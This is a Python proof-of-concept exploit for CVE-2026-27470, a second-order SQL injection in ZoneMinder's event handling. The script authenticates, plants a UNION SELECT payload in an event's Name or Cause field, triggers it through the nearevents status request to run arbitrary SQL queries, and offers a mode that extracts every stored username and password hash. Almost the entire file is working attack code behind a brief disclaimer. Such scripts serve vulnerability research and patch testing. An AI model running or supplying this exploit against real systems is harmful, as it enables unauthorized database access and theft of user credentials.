#!/usr/bin/env python3
"""
CVE-2026-27470 - ZoneMinder Second-Order SQL Injection PoC
=============================================================
Affected versions : <= 1.36.37 and 1.37.61 - 1.38.0
Fixed in          : 1.36.38 / 1.38.1
Vulnerable file   : web/ajax/status.php -> getNearEvents()

LEGAL DISCLAIMER:
    This tool is for educational and authorized security research purposes only.
    Do not use against systems you do not own or have explicit written
    permission to test.

Usage:
    python3 poc.py -t http://10.10.10.10 -u admin -p password
    python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"
    python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users
"""

import argparse
import re
import sys

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BANNER = """
╔══════════════════════════════════════════════════════════╗
║  CVE-2026-27470 — ZoneMinder Second-Order SQLi PoC       ║
║  CVSS 8.8 | Authenticated | Events Permission            ║
╚══════════════════════════════════════════════════════════╝
"""

# Upper bound (seconds) for every HTTP request so an unresponsive host cannot
# hang the script indefinitely.
REQUEST_TIMEOUT = 15

# Patterns tried in order when looking for the __csrf_magic token in a page:
# first the JavaScript variable, then the hidden form input.
_CSRF_PATTERNS = (
    re.compile(r'csrfMagicToken\s*=\s*["\']([^"\']+)["\']'),
    re.compile(r'name=["\']__csrf_magic["\'][^>]*value=["\']([^"\']+)["\']'),
)

# Errors that can occur while decoding a response as JSON and walking it as
# the expected dict/list structure.
_PARSE_ERRORS = (ValueError, AttributeError, KeyError, IndexError, TypeError)


def _extract_csrf_token(html):
    """Return the first CSRF token found in *html*, or None if there is none."""
    for pattern in _CSRF_PATTERNS:
        match = pattern.search(html)
        if match:
            return match.group(1)
    return None


def _with_csrf(session, data):
    """Add the CSRF token stored on *session* (if any) to form *data*."""
    token = getattr(session, "_zm_csrf", None)
    if token:
        data["__csrf_magic"] = token
    return data


def get_csrf_token(session, target):
    """Fetch the root page of *target* and return its __csrf_magic token.

    Returns None when neither token pattern matches the page.
    """
    resp = session.get(
        f"{target}/", verify=False, allow_redirects=True, timeout=REQUEST_TIMEOUT
    )
    return _extract_csrf_token(resp.text)


def login(session, target, username, password):
    """
    Authenticate to ZoneMinder and retrieve session cookie + CSRF token.

    If ZM_OPT_USE_AUTH=0, authentication is skipped and only the session is
    initialized. The CSRF token (or None) is stored on the session object as
    ``_zm_csrf`` for the later POST requests.

    Returns True when the session looks usable, False otherwise.
    """
    # Load the root page to initialize the session and grab the CSRF token
    resp = session.get(
        f"{target}/", verify=False, allow_redirects=True, timeout=REQUEST_TIMEOUT
    )
    csrf = _extract_csrf_token(resp.text)
    session._zm_csrf = csrf  # Store for later use

    # If auth is disabled, ZoneMinder redirects to the privacy page — session is ready
    if "privacy" in resp.url:
        print("[*] ZM_OPT_USE_AUTH=0 detected — auth disabled, session ready.")
        return True

    # Auth is enabled — send login POST
    data = {
        "view": "login",
        "action": "login",
        "username": username,
        "password": password,
    }
    if csrf:
        data["__csrf_magic"] = csrf
    resp2 = session.post(
        f"{target}/index.php",
        data=data,
        verify=False,
        allow_redirects=True,
        timeout=REQUEST_TIMEOUT,
    )

    # Refresh CSRF token after login; keep the old one if the page has none
    refreshed = _extract_csrf_token(resp2.text)
    if refreshed:
        session._zm_csrf = refreshed

    if "logout" in resp2.text.lower() or "console" in resp2.url:
        return True

    # Inconclusive response: confirm by requesting a view that needs a session
    if resp2.status_code in (200, 302):
        resp3 = session.get(
            f"{target}/index.php?view=console",
            verify=False,
            allow_redirects=True,
            timeout=REQUEST_TIMEOUT,
        )
        if resp3.status_code == 200 and "login" not in resp3.url:
            return True
    return False


def get_event_id(session, target):
    """Retrieve any available event ID via the ZoneMinder status API.

    Returns the ID of the first listed event, or None when the response is not
    JSON, has an unexpected shape, or lists no events.
    """
    params = {
        "request": "status",
        "entity": "events",
        "sort_field": "Id",
        "sort_asc": "1",
        "limit": "1",
    }
    resp = session.get(
        f"{target}/index.php", params=params, verify=False, timeout=REQUEST_TIMEOUT
    )
    try:
        events = resp.json().get("results", [])
        if events:
            return events[0].get("Id") or events[0].get("id")
    except _PARSE_ERRORS:
        # Best effort: the caller reports "no events" and suggests --event-id.
        pass
    return None


def inject_payload(session, target, event_id, payload, field="Name"):
    """
    Phase 1: Write the payload into the event Name or Cause field.

    ZoneMinder uses a parameterized query here — the payload is stored safely.
    Any *field* other than "Name" is treated as "Cause"; that request also
    sets the event Notes to "poc".

    Returns True when the server answers with HTTP 200.
    """
    if field == "Name":
        data = {
            "request": "event",
            "action": "rename",
            "id": event_id,
            "eventName": payload,
        }
    else:  # Cause
        data = {
            "request": "event",
            "action": "edit",
            "id": event_id,
            "newEvent[Cause]": payload,
            "newEvent[Notes]": "poc",
        }
    resp = session.post(
        f"{target}/index.php",
        data=_with_csrf(session, data),
        verify=False,
        timeout=REQUEST_TIMEOUT,
    )
    return resp.status_code == 200


def trigger_sqli(session, target, event_id, field="Name"):
    """
    Phase 2: Trigger second-order injection via getNearEvents().

    The stored payload is read from the DB and concatenated unsafely into SQL.
    Returns the raw HTTP response so the caller can parse it.
    """
    params = {
        "request": "status",
        "entity": "nearevents",
        "id": event_id,
        "sort_field": field,
        "sort_asc": "1",
    }
    return session.get(
        f"{target}/index.php", params=params, verify=False, timeout=REQUEST_TIMEOUT
    )


def restore_event_name(session, target, event_id, original_name="Event"):
    """Rename the event to *original_name* after the test.

    NOTE(review): the name the event had before the test is never read by this
    script, so callers relying on the default end up with the event renamed to
    "Event" rather than its true previous name.
    """
    data = {
        "request": "event",
        "action": "rename",
        "id": event_id,
        "eventName": original_name,
    }
    session.post(
        f"{target}/index.php",
        data=_with_csrf(session, data),
        verify=False,
        timeout=REQUEST_TIMEOUT,
    )


def _extract_result(resp):
    """Pull the query result out of the nearevents response.

    Falls back to the stringified JSON document when no known key carries a
    value, and to the first 500 characters of the body when the response
    cannot be parsed.
    """
    try:
        data = resp.json()
        result = None
        # Real ZoneMinder response: {"nearevents": {"NextEventId": ""}}
        nearevents = data.get("nearevents", {})
        if nearevents:
            result = (
                nearevents.get("NextEventId")
                or nearevents.get("PrevEventId")
                or nearevents.get("NextEventStartTime")
            )
        # Fallback: {"results": [...]}
        if not result:
            results = data.get("results", data.get("data", []))
            if results:
                result = results[0].get("Id") or results[0].get("StartDateTime")
        if not result:
            result = str(data)
        return result
    except _PARSE_ERRORS:
        return resp.text[:500]


def _cleanup(session, target, event_id, field):
    """Undo the Phase 1 write where this script is able to."""
    if field == "Name":
        restore_event_name(session, target, event_id)
        print("[*] Event name restored.")
    else:
        # The Name field was never touched in this mode, so renaming the event
        # would only destroy unrelated data. The previous Cause/Notes values
        # are unknown to this script and cannot be put back automatically.
        print("[!] Cause/Notes fields were modified and must be reset manually.")


def run_exploit(target, username, password, sql_query, field="Name",
                restore=True, manual_event_id=None):
    """Run one full store-then-trigger cycle and return the extracted value.

    Args:
        target: Base URL of the ZoneMinder instance, without trailing slash.
        username: Account name used for login.
        password: Password used for login.
        sql_query: Query embedded in the stored payload.
        field: Event field carrying the payload, "Name" or "Cause".
        restore: When true, clean up the modified event afterwards.
        manual_event_id: Event ID to use instead of looking one up.

    Returns:
        The value parsed from the response (see ``_extract_result``).

    Exits the process with status 1 when login fails, no event is available,
    or the payload cannot be written.
    """
    # The context manager closes pooled connections on every exit path.
    with requests.Session() as session:
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"
        })

        print(f"\n[*] Target : {target}")
        print(f"[*] User : {username}")
        print(f"[*] Query : {sql_query}\n")

        # Step 1 — Authenticate
        print("[*] Logging in...")
        if not login(session, target, username, password):
            print("[-] Login failed. Check credentials.")
            sys.exit(1)
        print("[+] Session established.")

        # Step 2 — Get event ID
        if manual_event_id:
            event_id = manual_event_id
            print(f"[+] Event ID (manual): {event_id}")
        else:
            print("[*] Looking for an event ID...")
            event_id = get_event_id(session, target)
            if not event_id:
                print("[-] No events found. Specify one manually with --event-id.")
                sys.exit(1)
            print(f"[+] Event ID: {event_id}")

        # Step 3 — Build UNION-based payload
        # Events.Name is varchar(64) — keep payloads under 63 characters
        # UNION SELECT requires 2 columns to match (Id, StartDateTime)
        union_payload = f"' UNION SELECT ({sql_query}),NULL-- -"
        print(f"[*] Injecting payload into '{field}' field...")
        if not inject_payload(session, target, event_id, union_payload, field=field):
            print("[-] Failed to write payload. Check permissions.")
            sys.exit(1)
        print("[+] Payload stored via parameterized query — looks clean in the DB.")

        try:
            # Step 4 — Trigger second-order injection
            print("[*] Triggering second-order injection...")
            resp = trigger_sqli(session, target, event_id, field=field)
            print(f"[*] HTTP {resp.status_code}")
            result = _extract_result(resp)
        finally:
            # Step 5 — Cleanup. Runs even when the trigger request raises, so
            # the modified event is not left behind on the target.
            if restore:
                _cleanup(session, target, event_id, field)

    return result


def _dump_users(target, args, common):
    """Print the user count, then username/password-hash pairs one at a time."""
    print("[*] Mode: User dump")
    count_result = run_exploit(
        target, args.username, args.password,
        "SELECT COUNT(*) FROM Users",
        **common
    )
    print(f"\n[+] User count: {count_result}\n")

    # Events.Name is varchar(64) — fetch username and hash separately to stay within limit
    for i in range(10):
        uname = run_exploit(
            target, args.username, args.password,
            f"SELECT Username FROM Users LIMIT {i},1",
            **common
        )
        # Empty result means no more users
        uname_str = str(uname) if uname else ""
        if not uname_str or uname_str in ("None", "1", "") or "{" in uname_str:
            break

        passwd = run_exploit(
            target, args.username, args.password,
            f"SELECT Password FROM Users LIMIT {i},1",
            **common
        )
        print(f"[+] User {i+1}: {uname}:{passwd}")


def main():
    """Parse the command line and run either a single query or the user dump."""
    print(BANNER)

    parser = argparse.ArgumentParser(
        description="CVE-2026-27470 — ZoneMinder Second-Order SQL Injection PoC"
    )
    parser.add_argument("-t", "--target", required=True,
                        help="Target URL (e.g. http://10.10.10.10)")
    parser.add_argument("-u", "--username", required=True,
                        help="ZoneMinder username")
    parser.add_argument("-p", "--password", required=True,
                        help="ZoneMinder password")
    parser.add_argument("--event-id", type=int,
                        help="Event ID to use as injection carrier")
    parser.add_argument("--field", default="Name", choices=["Name", "Cause"],
                        help="Injection field (default: Name)")
    parser.add_argument("--query", default="SELECT VERSION()",
                        help="SQL query to execute")
    parser.add_argument("--dump-users", action="store_true",
                        help="Dump all usernames and password hashes")
    parser.add_argument("--no-restore", action="store_true",
                        help="Do not restore the event name after exploitation")
    args = parser.parse_args()

    target = args.target.rstrip("/")
    # Keyword arguments shared by every run_exploit() call below.
    common = {
        "field": args.field,
        "restore": not args.no_restore,
        "manual_event_id": args.event_id,
    }

    try:
        if args.dump_users:
            _dump_users(target, args, common)
        else:
            result = run_exploit(
                target, args.username, args.password,
                args.query,
                **common
            )
            print(f"\n[+] Result: {result}\n")
    except requests.RequestException as exc:
        # Connection errors and timeouts end the run with a message rather
        # than a traceback.
        print(f"[-] Request failed: {exc}")
        sys.exit(1)


if __name__ == "__main__":
    main()